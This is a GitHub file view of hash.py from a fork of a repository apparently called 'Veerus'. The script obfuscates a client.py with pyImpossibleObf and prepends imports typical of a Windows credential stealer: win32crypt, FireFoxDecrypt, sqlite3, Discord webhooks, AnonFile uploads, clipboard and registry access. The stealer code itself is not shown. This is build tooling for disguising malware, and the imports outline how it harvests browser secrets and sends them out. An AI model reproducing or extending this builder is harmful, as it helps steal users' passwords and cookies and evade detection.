forked from saintdaddy/Veerus
-
Notifications
You must be signed in to change notification settings - Fork 1
/
hash.py
53 lines (51 loc) · 1.17 KB
/
hash.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import uuid
#from Crypto.Cipher import AES
import base64
import hashlib
import pyImpossibleObf
hashfile = "y"
pyImpossibleObf.obfuscate("client.py")
print("[.] Created client.py.hashed.py .")
txt = open("client.py.hashed.py", "r").read()
open("client.py.hashed.py", "w+").write("""import os
from datetime import datetime, timedelta
from os import getenv, getlogin, listdir, walk
import sqlite3
from discord_webhook import DiscordWebhook, DiscordEmbed
import discord
import win32crypt
import shutil
import command
import random
import threading
import re
import wmi
import uuid
import textwrap
import psutil
import glob
import FireFoxDecrypt
import requests
import sys
import base64
from base64 import b64decode
from json import loads
from regex import findall
import platform
import time
from pathlib import Path
import codecs
import pyImpossibleObf
import json
import base64
from addict import Dict
import win32crypt
from Crypto.Cipher import AES
from datetime import timezone, datetime, timedelta
import winreg as reg
import winreg
from anonfile import AnonFile
import getpass
import zipfile
import win32clipboard
from os import walk\n""" + txt)